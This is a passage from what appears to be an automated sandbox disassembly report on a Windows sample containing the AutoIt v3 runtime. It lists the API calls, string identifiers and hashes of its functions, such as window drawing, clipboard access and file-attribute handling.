                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                          • String ID:
                                          • API String ID: 15083398-0
                                          • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                          • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                          • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                          • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                          APIs
                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                          • GetWindowRect.USER32(?,?), ref: 00471CF7
                                          • GetClientRect.USER32(?,?), ref: 00471D05
                                          • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                          • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                          • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                          • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                          • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                          • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                          • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                          • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                          • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                          • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                          • GetClientRect.USER32(?,?), ref: 00471E8A
                                          • GetStockObject.GDI32(00000011), ref: 00471EA6
                                          • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                          • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                          • String ID: @$AutoIt v3 GUI
                                          • API String ID: 867697134-3359773793
                                          • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                          • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                          • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                          • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: __wcsicoll$__wcsnicmp
                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                          • API String ID: 790654849-32604322
                                          • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                          • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                          • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                          • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                          • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                          • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                          • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                          APIs
                                            • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                          • _fseek.LIBCMT ref: 00452B3B
                                          • __wsplitpath.LIBCMT ref: 00452B9B
                                          • _wcscpy.LIBCMT ref: 00452BB0
                                          • _wcscat.LIBCMT ref: 00452BC5
                                          • __wsplitpath.LIBCMT ref: 00452BEF
                                          • _wcscat.LIBCMT ref: 00452C07
                                          • _wcscat.LIBCMT ref: 00452C1C
                                          • __fread_nolock.LIBCMT ref: 00452C53
                                          • __fread_nolock.LIBCMT ref: 00452C64
                                          • __fread_nolock.LIBCMT ref: 00452C83
                                          • __fread_nolock.LIBCMT ref: 00452C94
                                          • __fread_nolock.LIBCMT ref: 00452CB5
                                          • __fread_nolock.LIBCMT ref: 00452CC6
                                          • __fread_nolock.LIBCMT ref: 00452CD7
                                          • __fread_nolock.LIBCMT ref: 00452CE8
                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                          • __fread_nolock.LIBCMT ref: 00452D78
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                          • String ID:
                                          • API String ID: 2054058615-0
                                          • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                          • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                          • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                          • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                          APIs
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Window
                                          • String ID: 0
                                          • API String ID: 2353593579-4108050209
                                          • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                          • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                          • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                          • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                          APIs
                                          • GetSysColor.USER32(0000000F), ref: 0044A05E
                                          • GetClientRect.USER32(?,?), ref: 0044A0D1
                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                          • GetWindowDC.USER32(?), ref: 0044A0F6
                                          • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                          • ReleaseDC.USER32(?,?), ref: 0044A11B
                                          • GetSysColor.USER32(0000000F), ref: 0044A131
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                          • GetSysColor.USER32(0000000F), ref: 0044A14F
                                          • GetSysColor.USER32(00000005), ref: 0044A15B
                                          • GetWindowDC.USER32(?), ref: 0044A1BE
                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                          • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                          • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                          • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                          • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                          • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                          • GetSysColor.USER32(00000008), ref: 0044A265
                                          • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                          • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                          • GetStockObject.GDI32(00000005), ref: 0044A28A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                          • String ID:
                                          • API String ID: 1744303182-0
                                          • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                          • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                          • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                          • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                          APIs
                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                          • __mtterm.LIBCMT ref: 00417C34
                                            • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                            • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                            • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                            • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                          • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                          • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                          • __init_pointers.LIBCMT ref: 00417CE6
                                          • __calloc_crt.LIBCMT ref: 00417D54
                                          • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                          • API String ID: 4163708885-3819984048
                                          • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                          • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                          • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                          • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: __wcsicoll$IconLoad
                                          • String ID: blank$info$question$stop$warning
                                          • API String ID: 2485277191-404129466
                                          • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                          • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                          • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                          • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                          APIs
                                          • LoadIconW.USER32(?,00000063), ref: 0045464C
                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                          • SetWindowTextW.USER32(?,?), ref: 00454678
                                          • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                          • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                          • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                          • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                          • GetWindowRect.USER32(?,?), ref: 004546F5
                                          • SetWindowTextW.USER32(?,?), ref: 00454765
                                          • GetDesktopWindow.USER32 ref: 0045476F
                                          • GetWindowRect.USER32(00000000), ref: 00454776
                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                          • GetClientRect.USER32(?,?), ref: 004547D2
                                          • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                          • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                          • String ID:
                                          • API String ID: 3869813825-0
                                          • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                          • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                          • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                          • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                          APIs
                                          • _wcslen.LIBCMT ref: 00464B28
                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                          • _wcslen.LIBCMT ref: 00464C28
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                          • _wcslen.LIBCMT ref: 00464CBA
                                          • _wcslen.LIBCMT ref: 00464CD0
                                          • _wcslen.LIBCMT ref: 00464CEF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _wcslen$Directory$CurrentSystem
                                          • String ID: D
                                          • API String ID: 1914653954-2746444292
                                          • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                          • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                          • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                          • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                          APIs
                                          • _wcsncpy.LIBCMT ref: 0045CE39
                                          • __wsplitpath.LIBCMT ref: 0045CE78
                                          • _wcscat.LIBCMT ref: 0045CE8B
                                          • _wcscat.LIBCMT ref: 0045CE9E
                                          • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                          • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                          • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                          • _wcscpy.LIBCMT ref: 0045CF61
                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                          • String ID: *.*
                                          • API String ID: 1153243558-438819550
                                          • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                          • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                          • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                          • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: __wcsicoll
                                          • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                          • API String ID: 3832890014-4202584635
                                          • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                          • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                          • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                          • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                          APIs
                                          • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                          • GetFocus.USER32 ref: 0046A0DD
                                          • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
